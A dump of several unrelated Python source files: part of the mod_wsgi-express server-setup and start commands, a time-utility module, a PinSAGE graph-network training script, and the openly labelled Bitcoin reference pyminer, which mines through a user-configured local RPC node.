options['verbose_debugging_flag'] = 'Off' if options['server_name']: host = options['server_name'] else: host = options['host'] options['server_host'] = host if options['port'] == 80: options['url'] = 'http://%s/' % host else: options['url'] = 'http://%s:%s/' % (host, options['port']) if options['https_port'] == 443: options['https_url'] = 'https://%s/' % host elif options['https_port'] is not None: options['https_url'] = 'https://%s:%s/' % (host, options['https_port']) else: options['https_url'] = None if options['destroy_interpreter']: options['httpd_arguments_list'].append('-DDESTROY_INTERPRETER') if options['embedded_mode']: options['httpd_arguments_list'].append('-DEMBEDDED_MODE') options['disable_reloading'] = True if any((options['enable_debugger'], options['enable_coverage'], options['enable_profiler'], options['enable_recorder'], options['enable_gdb'])): options['debug_mode'] = True if options['debug_mode']: options['httpd_arguments_list'].append('-DONE_PROCESS') if options['debug_mode']: if options['enable_coverage']: if not options['coverage_directory']: options['coverage_directory'] = posixpath.join( options['server_root'], 'htmlcov') else: options['coverage_directory'] = posixpath.abspath( options['coverage_directory']) try: os.mkdir(options['coverage_directory']) except Exception: pass if options['enable_profiler']: if not options['profiler_directory']: options['profiler_directory'] = posixpath.join( options['server_root'], 'pstats') else: options['profiler_directory'] = posixpath.abspath( options['profiler_directory']) try: os.mkdir(options['profiler_directory']) except Exception: pass if options['enable_recorder']: if not options['recorder_directory']: options['recorder_directory'] = posixpath.join( options['server_root'], 'archive') else: options['recorder_directory'] = posixpath.abspath( options['recorder_directory']) try: os.mkdir(options['recorder_directory']) except Exception: pass else: options['enable_debugger'] = False options['enable_coverage'] = False options['enable_profiler'] = False options['enable_recorder'] = False options['enable_gdb'] = False options['parent_domain'] = 'unspecified' if options['server_name']: options['httpd_arguments_list'].append('-DMOD_WSGI_VIRTUAL_HOST') if options['server_name'].lower().startswith('www.'): options['httpd_arguments_list'].append('-DMOD_WSGI_REDIRECT_WWW') options['parent_domain'] = options['server_name'][4:] if options['http2']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_HTTP2') if (options['https_port'] and options['ssl_certificate_file'] and options['ssl_certificate_key_file']): options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_HTTPS') if options['ssl_ca_certificate_file']: options['httpd_arguments_list'].append('-DMOD_WSGI_VERIFY_CLIENT') if options['ssl_certificate_chain_file']: options['httpd_arguments_list'].append('-DMOD_WSGI_CERTIFICATE_CHAIN') if options['ssl_environment']: options['httpd_arguments_list'].append('-DMOD_WSGI_SSL_ENVIRONMENT') if options['https_only']: options['httpd_arguments_list'].append('-DMOD_WSGI_HTTPS_ONLY') if options['hsts_policy']: options['httpd_arguments_list'].append('-DMOD_WSGI_HSTS_POLICY') if options['server_aliases']: options['httpd_arguments_list'].append('-DMOD_WSGI_SERVER_ALIAS') options['server_aliases'] = ' '.join(options['server_aliases']) if options['allow_localhost']: options['httpd_arguments_list'].append('-DMOD_WSGI_ALLOW_LOCALHOST') if options['application_type'] == 'static': options['httpd_arguments_list'].append('-DMOD_WSGI_STATIC_ONLY') if options['enable_sendfile']: options['httpd_arguments_list'].append('-DMOD_WSGI_ENABLE_SENDFILE') if options['server_metrics']: options['httpd_arguments_list'].append('-DMOD_WSGI_SERVER_METRICS') if options['server_status']: options['httpd_arguments_list'].append('-DMOD_WSGI_SERVER_METRICS') options['httpd_arguments_list'].append('-DMOD_WSGI_SERVER_STATUS') if options['directory_index']: options['httpd_arguments_list'].append('-DMOD_WSGI_DIRECTORY_INDEX') if options['directory_listing']: options['httpd_arguments_list'].append('-DMOD_WSGI_DIRECTORY_LISTING') if options['error_log_format']: options['httpd_arguments_list'].append('-DMOD_WSGI_ERROR_LOG_FORMAT') if options['access_log']: options['httpd_arguments_list'].append('-DMOD_WSGI_ACCESS_LOG') if options['rotate_logs']: options['httpd_arguments_list'].append('-DMOD_WSGI_ROTATE_LOGS') if options['keep_alive'] != 0: options['httpd_arguments_list'].append('-DMOD_WSGI_KEEP_ALIVE') if options['compress_responses'] != 0: options['httpd_arguments_list'].append('-DMOD_WSGI_COMPRESS_RESPONSES') if options['multiprocess']: options['httpd_arguments_list'].append('-DMOD_WSGI_MULTIPROCESS') if options['listener_host']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_LISTENER_HOST') if options['error_override']: options['httpd_arguments_list'].append('-DMOD_WSGI_ERROR_OVERRIDE') if options['host_access_script']: options['httpd_arguments_list'].append('-DMOD_WSGI_HOST_ACCESS') if options['auth_user_script']: options['httpd_arguments_list'].append('-DMOD_WSGI_AUTH_USER') if options['auth_group_script']: options['httpd_arguments_list'].append('-DMOD_WSGI_AUTH_GROUP') if options['chunked_request']: options['httpd_arguments_list'].append('-DMOD_WSGI_CHUNKED_REQUEST') if options['with_php5']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_PHP5') if options['proxy_mount_points'] or options['proxy_virtual_hosts']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_PROXY') if options['trusted_proxy_headers']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_PROXY_HEADERS') if options['trusted_proxies']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_TRUSTED_PROXIES') if options['python_path']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_PYTHON_PATH') if options['socket_prefix']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_SOCKET_PREFIX') if options['disable_reloading']: options['httpd_arguments_list'].append('-DMOD_WSGI_DISABLE_RELOADING') if options['with_cgi']: if os.path.exists(posixpath.join(options['modules_directory'], 'mod_cgid.so')): options['httpd_arguments_list'].append('-DMOD_WSGI_CGID_SCRIPT') else: options['httpd_arguments_list'].append('-DMOD_WSGI_CGI_SCRIPT') options['httpd_arguments_list'].extend( _mpm_module_defines(options['modules_directory'], options['server_mpm_variables'])) options['python_executable'] = sys.executable options['shlibpath_var'] = apxs_config.SHLIBPATH_VAR options['shlibpath'] = apxs_config.SHLIBPATH if _py_dylib: options['httpd_arguments_list'].append('-DMOD_WSGI_LOAD_PYTHON_DYLIB') options['python_dylib'] = _py_dylib options['httpd_arguments'] = '-f %s %s' % (options['httpd_conf'], ' '.join(options['httpd_arguments_list'])) generate_wsgi_handler_script(options) if options['with_newrelic_platform']: generate_server_metrics_script(options) print('Server URL :', options['url']) if options['https_url']: print('Server URL (HTTPS) :', options['https_url']) if options['server_status']: print('Server Status :', '%sserver-status' % options['url']) print('Server Root :', options['server_root']) print('Server Conf :', options['httpd_conf']) print('Error Log File : %s (%s)' % (options['error_log_file'], options['log_level'])) if options['access_log']: print('Access Log File :', options['access_log_file']) if options['startup_log']: print('Startup Log File :', options['startup_log_file']) if options['enable_coverage']: print('Coverage Output :', posixpath.join( options['coverage_directory'], 'index.html')) if options['enable_profiler']: print('Profiler Output :', options['profiler_directory']) if options['enable_recorder']: print('Recorder Output :', options['recorder_directory']) if options['rewrite_rules']: print('Rewrite Rules :', options['rewrite_rules']) if os.name != 'nt': if options['envvars_script']: print('Environ Variables :', options['envvars_script']) if command == 'setup-server' or options['setup_only']: if not options['rewrite_rules']: print('Rewrite Rules :', options['server_root'] + '/rewrite.conf') if os.name != 'nt': if not options['envvars_script']: print('Environ Variables :', options['server_root'] + '/envvars') print('Control Script :', options['server_root'] + '/apachectl') if options['debug_mode']: print('Operating Mode : debug') elif options['embedded_mode']: print('Operating Mode : embedded') else: print('Operating Mode : daemon') if options['processes'] == 1: print('Request Capacity : %s (%s process * %s threads)' % ( options['processes']*options['threads'], options['processes'], options['threads'])) else: print('Request Capacity : %s (%s processes * %s threads)' % ( options['processes']*options['threads'], options['processes'], options['threads'])) if not options['debug_mode'] and not options['embedded_mode']: print('Request Timeout : %s (seconds)' % options['request_timeout']) if options['startup_timeout']: print('Startup Timeout : %s (seconds)' % options['startup_timeout']) print('Queue Backlog : %s (connections)' % options['daemon_backlog']) print('Queue Timeout : %s (seconds)' % options['queue_timeout']) print('Server Capacity : %s (event/worker), %s (prefork)' % ( options['worker_max_clients'], options['prefork_max_clients'])) print('Server Backlog : %s (connections)' % options['server_backlog']) print('Locale Setting :', options['locale']) sys.stdout.flush() if not options['rewrite_rules']: options['rewrite_rules'] = options['server_root'] + '/rewrite.conf' if not os.path.isfile(options['rewrite_rules']): with open(options['rewrite_rules'], 'w') as fp: pass generate_apache_config(options) if os.name != 'nt': generate_control_scripts(options) return options def cmd_start_server(params): formatter = optparse.IndentedHelpFormatter() formatter.set_long_opt_delimiter(' ') usage = '%prog start-server script [options]' parser = optparse.OptionParser(usage=usage, option_list=option_list, formatter=formatter) (options, args) = parser.parse_args(params) config = _cmd_setup_server('start-server', args, vars(options)) if config['setup_only']: return if os.name == 'nt': print() print("WARNING: The ability to use the start-server option on Windows") print("WARNING: is highly experimental and various things don't quite") print("WARNING: work properly. If you understand a lot about using") print("WARNING: Python on Windows and Windows programming in general,") print("WARNING: and would like to help to get it working properly, then") print("WARNING: you can ask about Windows support for the start-server") print("WARNING: option on the mod_wsgi mailing list.") print() executable = config['httpd_executable'] environ = copy.deepcopy(os.environ) environ['MOD_WSGI_MODULES_DIRECTORY'] = config['modules_directory'] httpd_arguments = list(config['httpd_arguments_list']) httpd_arguments.extend(['-f', config['httpd_conf']]) httpd_arguments.extend(['-DONE_PROCESS']) os.environ['MOD_WSGI_MODULES_DIRECTORY'] = config['modules_directory'] subprocess.call([executable]+httpd_arguments) sys.exit(0) else: executable = posixpath.join(config['server_root'], 'apachectl') if sys.stdout.isatty(): process = None def handler(signum, frame): if process is None: sys.exit(1) else: if signum not in [signal.SIGWINCH]: os.kill(process.pid, signum) signal.signal(signal.SIGINT, handler) signal.signal(signal.SIGTERM, handler) signal.signal(signal.SIGHUP, handler) signal.signal(signal.SIGUSR1, handler) signal.signal(signal.SIGWINCH, handler) process = subprocess.Popen([executable, 'start', '-DFOREGROUND'], preexec_fn=os.setpgrp) process.wait() else: os.execl(executable, executable, 'start', '-DFOREGROUND') def cmd_module_config(params): formatter = optparse.IndentedHelpFormatter() formatter.set_long_opt_delimiter(' ') usage = '%prog module-config' parser = optparse.OptionParser(usage=usage, formatter=formatter) (options, args) = parser.parse_args(params) if len(args) != 0: parser.error('Incorrect number of arguments.') if os.name == 'nt': real_prefix = getattr(sys, 'real_prefix', None) base_prefix = getattr(sys, 'base_prefix', None) real_prefix = real_prefix or base_prefix or sys.prefix library_version = sysconfig.get_config_var('VERSION') library_name = 'python%s.dll' % library_version library_path = posixpath.join(real_prefix, library_name) if not os.path.exists(library_path): library_name = 'python%s.dll' % library_version[0] library_path = posixpath.join(real_prefix, 'DLLs', library_name) if not os.path.exists(library_path): library_path = None if library_path: library_path = posixpath.normpath(library_path) library_path = library_path.replace('\\', '/') print('LoadFile "%s"' % library_path) module_path = where() module_path = module_path.replace('\\', '/') prefix = sys.prefix prefix = posixpath.normpath(prefix) prefix = prefix.replace('\\', '/') print('LoadModule wsgi_module "%s"' % module_path) print('WSGIPythonHome "%s"' % prefix) else: module_path = where() prefix = sys.prefix prefix = posixpath.normpath(prefix) if _py_dylib: print('LoadFile "%s"' % _py_dylib) print('LoadModule wsgi_module "%s"' % module_path) print('WSGIPythonHome "%s"' % prefix) def cmd_install_module(params): formatter = optparse.IndentedHelpFormatter() formatter.set_long_opt_delimiter(' ') usage = '%prog install-module [options]' parser = optparse.OptionParser(usage=usage, formatter=formatter) parser.add_option('--modules-directory', metavar='DIRECTORY', default=apxs_config.LIBEXECDIR) (options, args) = parser.parse_args(params) if len(args) != 0: parser.error('Incorrect number of arguments.') target = posixpath.abspath(posixpath.join(options.modules_directory, posixpath.basename(MOD_WSGI_SO))) shutil.copyfile(where(), target) if _py_dylib: print('LoadFile "%s"' % _py_dylib) print('LoadModule wsgi_module "%s"' % target) print('WSGIPythonHome "%s"' % posixpath.normpath(sys.prefix)) def cmd_module_location(params): formatter = optparse.IndentedHelpFormatter() formatter.set_long_opt_delimiter(' ') usage = '%prog module-location' parser = optparse.OptionParser(usage=usage, formatter=formatter) (options, args) = parser.parse_args(params) if len(args) != 0: parser.error('Incorrect number of arguments.') print(where()) if os.name == 'nt': main_usage=""" %prog command [params] Commands: module-config module-location """ else: main_usage=""" %prog command [params] Commands: install-module module-config module-location setup-server start-server """ def main(): parser = optparse.OptionParser(main_usage.strip()) args = sys.argv[1:] if not args: parser.error('No command was specified.') command = args.pop(0) args = [os.path.expandvars(arg) for arg in args] if os.name == 'nt': if command == 'module-config': cmd_module_config(args) elif command == 'module-location': cmd_module_location(args) elif command == 'start-server': cmd_start_server(args) else: parser.error('Invalid command was specified.') else: if command == 'install-module': cmd_install_module(args) elif command == 'module-config': cmd_module_config(args) elif command == 'module-location': cmd_module_location(args) elif command == 'setup-server': cmd_setup_server(args) elif command == 'start-server': cmd_start_server(args) else: parser.error('Invalid command was specified.') def start(*args): cmd_start_server(list(args)) if __name__ == '__main__': main()
utilities.py
import datetime import os import threading import time from calendar import timegm TIME_ZONE = 'Europe/Berlin' SECONDS_IN_A_MINUTE = 60 SECONDS_IN_AN_HOUR = SECONDS_IN_A_MINUTE * 60 SECONDS_IN_A_DAY = SECONDS_IN_AN_HOUR * 24 SECONDS_IN_A_WEEK = SECONDS_IN_A_DAY * 7 DAILY = 'daily' WEEKLY = 'weekly' DOY_YEAR_MILITARY = '%j%Y%H%M' DAY_MILITARY = '%a:%H%M' DOY_YEAR = '%j%Y' DOY = '%j' YEAR = '%Y' MILITARY_TIME = '%H%M' FMT_TIME = '%Y-%m-%d %H:%M' FMT_TIME_FILE = '%Y-%m-%d-%H-%M' def decorator(argument): def real_decorator(function): def wrapper(*args, **kwargs): print('1') print(argument) result = function(*args, **kwargs) print(2) return result return wrapper return real_decorator def set_tz(): os.environ['TZ'] = TIME_ZONE def log_time(do_print: bool = False): def real_log_time(orig_func): def wrapper(*args, **kwargs): start_time = time.time() result = orig_func(*args, **kwargs) time_lapsed = time.time() - start_time if do_print: print('{} completed {} seconds.'.format(orig_func.__name__.upper(), round(time_lapsed, 5))) return result return wrapper return real_log_time def new_thread(funct: object) -> object: def wrapper(*args, **kwargs): print(funct.__name__.upper(), 'args:', args, 'kwargs:', kwargs) thr = threading.Thread(target=funct, args=args) thr.daemon = True return thr.start() return wrapper def epoch(epoch=None, future_in_seconds: int = 0, custom_hhmm: int = None): if epoch is None: epoch = int(time.time()) if custom_hhmm is None: return int(time.time()) + future_in_seconds else: custom_timestamp = datetime.datetime.fromtimestamp( epoch + future_in_seconds).strftime( DOY_YEAR_MILITARY.replace('%H%M', str(custom_hhmm).zfill(4))) utc_time = time.strptime(custom_timestamp, DOY_YEAR_MILITARY) epoch_time = timegm(utc_time) return int(epoch_time) def epoch_to_custom_date(fmt: str, _epoch: int = None): if _epoch is None: _epoch = epoch() return datetime.datetime.fromtimestamp(_epoch).strftime(fmt) def get_week_number(): now = datetime.datetime.now() return datetime.date(now.year, now.month, now.day).isocalendar()[1] set_tz()
train_pinsage.py
import argparse import time import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import numpy as np import dgl.function as fn from dgl.nn.pytorch import GraphConv import dgl.multiprocessing as mp from torch.nn.parallel import DistributedDataParallel import sys import os import datetime import samgraph.torch as sam from common_config import * """ We have made the following modification(or say, simplification) on PinSAGE, because we only want to focus on the core algorithm of PinSAGE: 1. we modify PinSAGE to make it be able to be trained on homogenous graph. 2. we use cross-entropy loss instead of max-margin ranking loss describe in the paper. """ class WeightedSAGEConv(nn.Module): def __init__(self, input_dims, hidden_dims, output_dims, dropout, act=F.relu): super().__init__() self.act = act self.Q = nn.Linear(input_dims, hidden_dims) self.W = nn.Linear(input_dims + hidden_dims, output_dims) self.reset_parameters() self.dropout = nn.Dropout(dropout) def reset_parameters(self): gain = nn.init.calculate_gain('relu') nn.init.xavier_uniform_(self.Q.weight, gain=gain) nn.init.xavier_uniform_(self.W.weight, gain=gain) nn.init.constant_(self.Q.bias, 0) nn.init.constant_(self.W.bias, 0) def forward(self, g, h, weights): """ g : graph h : node features weights : scalar edge weights """ h_src, h_dst = h with g.local_scope(): g.srcdata['n'] = self.act(self.Q(self.dropout(h_src))) g.edata['w'] = weights.float() g.update_all(fn.u_mul_e('n', 'w', 'm'), fn.sum('m', 'n')) g.update_all(fn.copy_e('w', 'm'), fn.sum('m', 'ws')) n = g.dstdata['n'] ws = g.dstdata['ws'].unsqueeze(1).clamp(min=1) z = self.act(self.W(self.dropout(torch.cat([n / ws, h_dst], 1)))) z_norm = z.norm(2, 1, keepdim=True) z_norm = torch.where( z_norm == 0, torch.tensor(1.).to(z_norm), z_norm) z = z / z_norm return z class PinSAGE(nn.Module): def __init__(self, in_feats, n_hidden, n_classes, n_layers, activation, dropout): super().__init__() self.n_layers = n_layers self.n_hidden = n_hidden self.n_classes = n_classes self.layers = nn.ModuleList() self.layers.append(WeightedSAGEConv( in_feats, n_hidden, n_hidden, dropout, activation)) for _ in range(1, n_layers - 1): self.layers.append(WeightedSAGEConv( n_hidden, n_hidden, n_hidden, dropout, activation)) self.layers.append(WeightedSAGEConv( n_hidden, n_hidden, n_classes, dropout, activation)) def forward(self, blocks, h): for layer, block in zip(self.layers, blocks): h_dst = h[:block.number_of_nodes('DST/' + block.ntypes[0])] h = layer(block, (h, h_dst), block.edata['weights']) return h def parse_args(default_run_config): argparser = argparse.ArgumentParser("PinSAGE Training") add_common_arguments(argparser, default_run_config) argparser.add_argument('--random-walk-length', type=int, default=default_run_config['random_walk_length']) argparser.add_argument('--random-walk-restart-prob', type=float, default=default_run_config['random_walk_restart_prob']) argparser.add_argument('--num-random-walk', type=int, default=default_run_config['num_random_walk']) argparser.add_argument('--num-neighbor', type=int, default=default_run_config['num_neighbor']) argparser.add_argument('--num-layer', type=int, default=default_run_config['num_layer']) argparser.add_argument( '--lr', type=float, default=default_run_config['lr']) argparser.add_argument('--dropout', type=float, default=default_run_config['dropout']) return vars(argparser.parse_args()) def get_run_config(): run_config = {} run_config.update(get_default_common_config(run_mode=RunMode.SGNN)) run_config['sample_type'] = 'random_walk' run_config['random_walk_length'] = 3 run_config['random_walk_restart_prob'] = 0.5 run_config['num_random_walk'] = 4 run_config['num_neighbor'] = 5 run_config['num_layer'] = 3 run_config['lr'] = 0.003 run_config['dropout'] = 0.5 run_config.update(parse_args(run_config)) process_common_config(run_config) assert(run_config['arch'] == 'arch6') assert(run_config['sample_type'] == 'random_walk') print_run_config(run_config) if run_config['validate_configs']: sys.exit() return run_config def run_init(run_config): sam.config(run_config) sam.data_init() if run_config['validate_configs']: sys.exit() def run(worker_id, run_config): num_worker = run_config['num_worker'] global_barrier = run_config['global_barrier'] ctx = run_config['workers'][worker_id] device = torch.device(ctx) print('[Worker {:d}/{:d}] Started with PID {:d}({:s})'.format( worker_id, num_worker, os.getpid(), torch.cuda.get_device_name(ctx))) sam.sample_init(worker_id, ctx) sam.train_init(worker_id, ctx) if num_worker > 1: dist_init_method = 'tcp://{master_ip}:{master_port}'.format( master_ip='127.0.0.1', master_port='12345') world_size = num_worker torch.distributed.init_process_group(backend="nccl", init_method=dist_init_method, world_size=world_size, rank=worker_id, timeout=datetime.timedelta(seconds=get_default_timeout())) in_feat = sam.feat_dim() num_class = sam.num_class() num_layer = run_config['num_layer'] model = PinSAGE(in_feat, run_config['num_hidden'], num_class, num_layer, F.relu, run_config['dropout']) model = model.to(device) if num_worker > 1: model = DistributedDataParallel( model, device_ids=[device], output_device=device) loss_fcn = nn.CrossEntropyLoss() loss_fcn = loss_fcn.to(device) optimizer = optim.Adam( model.parameters(), lr=run_config['lr']) num_epoch = sam.num_epoch() num_step = sam.num_local_step() model.train() epoch_sample_total_times = [] epoch_sample_times = [] epoch_get_cache_miss_index_times = [] epoch_copy_times = [] epoch_convert_times = [] epoch_train_times = [] epoch_total_times_python = [] epoch_train_total_times_profiler = [] epoch_cache_hit_rates = [] copy_times = [] convert_times = [] train_times = [] total_times = [] # run start barrier global_barrier.wait() print('[Worker {:d}] run for {:d} epochs with {:d} steps'.format( worker_id, num_epoch, num_step)) run_start = time.time() for epoch in range(num_epoch): # epoch start barrier global_barrier.wait() tic = time.time() for step in range(worker_id, num_step * num_worker, num_worker): t0 = time.time() sam.sample_once() batch_key = sam.get_next_batch() t1 = time.time() blocks, batch_input, batch_label = sam.get_dgl_blocks_with_weights( batch_key, num_layer) t2 = time.time() # Compute loss and prediction batch_pred = model(blocks, batch_input) loss = loss_fcn(batch_pred, batch_label) optimizer.zero_grad() loss.backward() optimizer.step() event_sync() batch_input = None batch_label = None blocks = None if num_worker > 1: torch.distributed.barrier() t3 = time.time() copy_time = sam.get_log_step_value(epoch, step, sam.kLogL1CopyTime) convert_time = t2 - t1 train_time = t3 - t2 total_time = t3 - t1 sam.log_step(epoch, step, sam.kLogL1TrainTime, train_time) sam.log_step(epoch, step, sam.kLogL1ConvertTime, convert_time) sam.log_epoch_add(epoch, sam.kLogEpochConvertTime, convert_time) sam.log_epoch_add(epoch, sam.kLogEpochTrainTime, train_time) sam.log_epoch_add(epoch, sam.kLogEpochTotalTime, total_time) copy_times.append(copy_time) convert_times.append(convert_time) train_times.append(train_time) total_times.append(total_time) sam.report_step(epoch, step) event_sync() # sync the train workers if num_worker > 1: torch.distributed.barrier() toc = time.time() epoch_total_times_python.append(toc - tic) # epoch end barrier global_barrier.wait() feat_nbytes = sam.get_log_epoch_value( epoch, sam.kLogEpochFeatureBytes) miss_nbytes = sam.get_log_epoch_value( epoch, sam.kLogEpochMissBytes) epoch_cache_hit_rates.append( (feat_nbytes - miss_nbytes) / feat_nbytes) epoch_sample_total_times.append( sam.get_log_epoch_value(epoch, sam.kLogEpochSampleTotalTime) ) epoch_sample_times.append( sam.get_log_epoch_value(epoch, sam.kLogEpochSampleTime) ) epoch_get_cache_miss_index_times.append( sam.get_log_epoch_value( epoch, sam.KLogEpochSampleGetCacheMissIndexTime) ) epoch_copy_times.append( sam.get_log_epoch_value(epoch, sam.kLogEpochCopyTime)) epoch_convert_times.append( sam.get_log_epoch_value(epoch, sam.kLogEpochConvertTime)) epoch_train_times.append( sam.get_log_epoch_value(epoch, sam.kLogEpochTrainTime)) epoch_train_total_times_profiler.append( sam.get_log_epoch_value(epoch, sam.kLogEpochTotalTime)) if worker_id == 0: print('Epoch {:05d} | Epoch Time {:.4f} | Sample {:.4f} | Copy {:.4f} | Total Train(Profiler) {:.4f}'.format( epoch, epoch_total_times_python[-1], epoch_sample_total_times[-1], epoch_copy_times[-1], epoch_train_total_times_profiler[-1])) # sync the train workers if num_worker > 1: torch.distributed.barrier() # run end barrier global_barrier.wait() run_end = time.time() print('[Train Worker {:d}] Avg Epoch {:.4f} | Sample {:.4f} | Copy {:.4f} | Train Total (Profiler) {:.4f}'.format( worker_id, np.mean(epoch_total_times_python[1:]), np.mean(epoch_sample_total_times[1:]), np.mean(epoch_copy_times[1:]), np.mean(epoch_train_total_times_profiler[1:]))) global_barrier.wait() # barrier for pretty print if worker_id == 0: test_result = [] test_result.append(('sample_time', np.mean(epoch_sample_times[1:]))) test_result.append(('get_cache_miss_index_time', np.mean( epoch_get_cache_miss_index_times[1:]))) test_result.append( ('epoch_time:sample_total', np.mean(epoch_sample_total_times[1:]))) test_result.append(('epoch_time:copy_time', np.mean(epoch_copy_times[1:]))) test_result.append(('convert_time', np.mean(epoch_convert_times[1:]))) test_result.append(('train_time', np.mean(epoch_train_times[1:]))) test_result.append(('epoch_time:train_total', np.mean( epoch_train_total_times_profiler[1:]))) test_result.append( ('cache_percentage', run_config['cache_percentage'])) test_result.append(('cache_hit_rate', np.mean( epoch_cache_hit_rates[1:]))) test_result.append( ('epoch_time:total', np.mean(epoch_total_times_python[1:]))) test_result.append(('run_time', run_end - run_start)) for k, v in test_result: print('test_result:{:}={:.2f}'.format(k, v)) # sam.dump_trace() sam.shutdown() if __name__ == '__main__': run_config = get_run_config() run_init(run_config) num_worker = run_config['num_worker'] # global barrier is used to sync all the workers run_config['global_barrier'] = mp.Barrier( num_worker, timeout=get_default_timeout()) if num_worker == 1: run(0, run_config) else: workers = [] # sample processes for worker_id in range(num_worker): p = mp.Process(target=run, args=(worker_id, run_config)) p.start() workers.append(p) ret = sam.wait_one_child() if ret != 0: for p in workers: p.kill() for p in workers: p.join() if ret != 0: sys.exit(1)
pyminer.py
#!/usr/bin/python # # Copyright (c) 2011 The Bitcoin developers # Distributed under the MIT/X11 software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # import time import json import pprint import hashlib import struct import re import base64 import httplib import sys from multiprocessing import Process ERR_SLEEP = 15 MAX_NONCE = 1000000L settings = {} pp = pprint.PrettyPrinter(indent=4) class BitcoinRPC: OBJID = 1 def __init__(self, host, port, username, password): authpair = "%s:%s" % (username, password) self.authhdr = "Basic %s" % (base64.b64encode(authpair)) self.conn = httplib.HTTPConnection(host, port, False, 30) def rpc(self, method, params=None): self.OBJID += 1 obj = { 'version' : '1.1', 'method' : method, 'id' : self.OBJID } if params is None: obj['params'] = [] else: obj['params'] = params self.conn.request('POST', '/', json.dumps(obj), { 'Authorization' : self.authhdr, 'Content-type' : 'application/json' }) resp = self.conn.getresponse() if resp is None: print "JSON-RPC: no response" return None body = resp.read() resp_obj = json.loads(body) if resp_obj is None: print "JSON-RPC: cannot JSON-decode body" return None if 'error' in resp_obj and resp_obj['error'] != None: return resp_obj['error'] if 'result' not in resp_obj: print "JSON-RPC: no result in object" return None return resp_obj['result'] def getblockcount(self): return self.rpc('getblockcount') def getwork(self, data=None): return self.rpc('getwork', data) def uint32(x): return x & 0xffffffffL def bytereverse(x): return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) | (((x) >> 8) & 0x0000ff00) | ((x) >> 24) )) def bufreverse(in_buf): out_words = [] for i in range(0, len(in_buf), 4): word = struct.unpack('@I', in_buf[i:i+4])[0] out_words.append(struct.pack('@I', bytereverse(word))) return ''.join(out_words) def wordreverse(in_buf): out_words = [] for i in range(0, len(in_buf), 4): out_words.append(in_buf[i:i+4]) out_words.reverse() return ''.join(out_words) class Miner: def __init__(self, id): self.id = id self.max_nonce = MAX_NONCE def work(self, datastr, targetstr): # decode work data hex string to binary static_data = datastr.decode('hex') static_data = bufreverse(static_data) # the first 76b of 80b do not change blk_hdr = static_data[:76] # decode 256-bit target value targetbin = targetstr.decode('hex') targetbin = targetbin[::-1] # byte-swap and dword-swap targetbin_str = targetbin.encode('hex') target = long(targetbin_str, 16) # pre-hash first 76b of block header static_hash = hashlib.sha256() static_hash.update(blk_hdr) for nonce in xrange(self.max_nonce): # encode 32-bit nonce value nonce_bin = struct.pack("<I", nonce) # hash final 4b, the nonce value hash1_o = static_hash.copy() hash1_o.update(nonce_bin) hash1 = hash1_o.digest() # sha256 hash of sha256 hash hash_o = hashlib.sha256() hash_o.update(hash1) hash = hash_o.digest() # quick test for winning solution: high 32 bits zero? if hash[-4:] != '\0\0\0\0': continue # convert binary hash to 256-bit Python long hash = bufreverse(hash) hash = wordreverse(hash) hash_str = hash.encode('hex') l = long(hash_str, 16) # proof-of-work test: hash < target if l < target: print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,) return (nonce + 1, nonce_bin) else: print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,) # return (nonce + 1, nonce_bin) return (nonce + 1, None) def submit_work(self, rpc, original_data, nonce_bin): nonce_bin = bufreverse(nonce_bin) nonce = nonce_bin.encode('hex') solution = original_data[:152] + nonce + original_data[160:256] param_arr = [ solution ] result = rpc.getwork(param_arr) print time.asctime(), "--> Upstream RPC result:", result def iterate(self, rpc): work = rpc.getwork() if work is None: time.sleep(ERR_SLEEP) return if 'data' not in work or 'target' not in work: time.sleep(ERR_SLEEP) return time_start = time.time() (hashes_done, nonce_bin) = self.work(work['data'], work['target']) time_end = time.time() time_diff = time_end - time_start self.max_nonce = long( (hashes_done * settings['scantime']) / time_diff) if self.max_nonce > 0xfffffffaL: self.max_nonce = 0xfffffffaL if settings['hashmeter']: print "HashMeter(%d): %d hashes, %.2f Khash/sec" % ( self.id, hashes_done, (hashes_done / 1000.0) / time_diff) if nonce_bin is not None: self.submit_work(rpc, work['data'], nonce_bin) def loop(self): rpc = BitcoinRPC(settings['host'], settings['port'], settings['rpcuser'], settings['rpcpass']) if rpc is None: return while True: self.iterate(rpc) def miner_thread(id): miner = Miner(id) miner.loop() if __name__ == '__main__': if len(sys.argv) != 2: print "Usage: pyminer.py CONFIG-FILE" sys.exit(1) f = open(sys.argv[1]) for line in f: # skip comment lines m = re.search('^\s*#', line) if m: continue # parse key=value lines m = re.search('^(\w+)\s*=\s*(\S.*)$', line) if m is None: continue settings[m.group(1)] = m.group(2) f.close() if 'host' not in settings: settings['host'] = '127.0.0.1' if 'port' not in settings: settings['port'] = 9342 if 'threads' not in settings: settings['threads'] = 1 if 'hashmeter' not in settings: settings['hashmeter'] = 0 if 'scantime' not in settings: settings['scantime'] = 30L if 'rpcuser' not in settings or 'rpcpass' not in settings: print "Missing username and/or password in cfg file" sys.exit(1) settings['port'] = int(settings['port']) settings['threads'] = int(settings['threads']) settings['hashmeter'] = int(settings['hashmeter']) settings['scantime'] = long(settings['scantime']) thr_list = [] for thr_id in range(settings['threads']): p = Process(target=miner_thread, args=(thr_id,)) p.start() thr_list.append(p) time.sleep(1) # stagger threads print settings['threads'], "mining threads started" print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port']) try: for thr_proc in thr_list: thr_proc.join() except KeyboardInterrupt: pass print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
fastconditiontimedchangecalculator.py
